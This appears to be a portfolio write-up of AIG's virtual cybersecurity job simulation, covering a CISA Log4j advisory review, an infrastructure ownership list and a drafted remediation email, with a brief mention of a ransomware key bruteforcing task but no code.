AIG Insurance
Completed a job simulation involving the role of a cybersecurity generalist, specializing in cybersecurity.
Completed a cybersecurity threat analysis simulation for the Cyber Defense Unit, staying updated on CISA publications.
Researched and understood reported vulnerabilities, showcasing analytical skills in cybersecurity.
Drafted a clear and concise email to guide teams on vulnerability remediation.
Utilized Python skills to write a script for ethical hacking, avoiding ransom payments by bruteforcing decryption keys.
Communication
Cybersecurity
Data Analysis
Design Thinking
Problem Solving
Python
Research
Security Advisory
Security Engineering
Software Development
Solution Architecture
Strategy
Vulnerability Triage
Background information
You are an Information Security Analyst in the Cyber & Information Security Team.
A common task and responsibility of information security analysts is to stay on top of emerging vulnerabilities to make sure that the company can remediate them before an attacker can exploit them.
In this task, you will be asked to review some recent publications from the Cybersecurity & Infrastructure Security Agency (CISA). The Cybersecurity & Infrastructure Security Agency (CISA) is an Agency that has the goal of reducing the nationβs exposure to cyber security threats and risks.
After reviewing the publications, you will then need to draft an email to inform the relevant infrastructure owner at AIG of the seriousness of the vulnerability that has been reported.
Background information
Your advisory email in the last task was great. It provided context to the affected teams on what the vulnerability was, and how to remediate it.
Unfortunately, an attacker was able to exploit the vulnerability on the affected server and began installing a ransomware virus. Luckily, the Incident Detection & Response team was able to prevent the ransomware virus from completely installing, so it only managed to encrypt one zip file.
Internally, the Chief Information Security Officer does not want to pay the ransom, because there isnβt any guarantee that the decryption key will be provided or that the attackers wonβt strike again in the future.
Instead, we would like you to bruteforce the decryption key. Based on the attackerβs sloppiness, we donβt expect this to be a complicated encryption key, because they used copy-pasted payloads and immediately tried to use ransomware instead of moving around laterally on the network.
Task 1 - Responding to a zero-day vulnerability
The CISA has recently published the following two advisories:
The first advisory (Log4j), outlines a serious vulnerability in one of the worldβs most popular logging software.
The second advisory explores how ransomware has been increasing and is becoming professionalized - a concern for a large company like AIG.
Your task is to respond to the Apache Log4j zero-day vulnerability that was released to the public by advising affected teams of the vulnerability.
First, conduct your research on the vulnerability using the βCISA Advisory" resources provided above as a starting point.
Next, analyze the βInfrastructure Listβ below to find out which infrastructure may be affected by the vulnerability, and which team has ownership.
Product Team
Product Name
Team Lead
Services Installed
IT
Workstation Management System
Jane Doe (tech@email.com)
OpenSSH dnsmasq lighttpd
Product Development
Product Development Staging Environment
John Doe (product@email.com)
Dovecot pop3d Apache httpd Log4j Dovecot imapd MiniServ
Marketing
Marketing Analytics Server
Joe Schmoe (marketing@email.com)
Microsoft ftpd Indy httpd Microsoft Windows RPC Microsoft Windows netbios-ssn Microsoft Windows Server 2008 R2 - 2012 microsoft ds
HR
Human Resource Information System
Joe Bloggs (hr@email.com)
OpenSSH Apache httpd rpcbind2-4
From: AIG Cyber & Information Security Team To: John Doe <product@email.com> Subject: Security Advisory concerning Ransomware Exploitation of Log4j Vulnerabilities β Body: Hello John, AIG Cyber & Information Security Team would like to inform you of critical vulnerabilities in Apache Log4j, as outlined by CISA, that may expose our infrastructure to ransomware attacks.
Risk/Impact: Ransomware actors are actively exploiting vulnerabilities in Log4j (CVE-2021-44228, CVE-2021-45046, etc.) to gain unauthorized access to systems. Successful exploitation can allow attackers to take control of affected systems, leading to data encryption, operational disruptions, and potential data exfiltration. This poses a high risk of downtime, financial loss, and reputational damage.
Method of Exploitation: Attackers exploit Log4j vulnerabilities by sending specially crafted requests to vulnerable systems. This allows remote code execution (RCE), enabling ransomware actors to deliver payloads or gain administrative control of targeted environments.
Remediation:
Immediately update all instances of Log4j to the latest patched versions.
Use available web application firewall (WAF) rules to block malicious requests.
Monitor for any indicators of compromise (IoCs) related to Log4j exploitation.
Implement network segmentation and restrict internet-facing services to mitigate exposure.
Please ensure these steps are actioned promptly to reduce the risk of ransomware. For any questions or further guidance, donβt hesitate to reach out to us.
Kind regards,
AIG Cyber & Information Security Team
Task 2 - (Technical) Bypassing ransomware
Last updated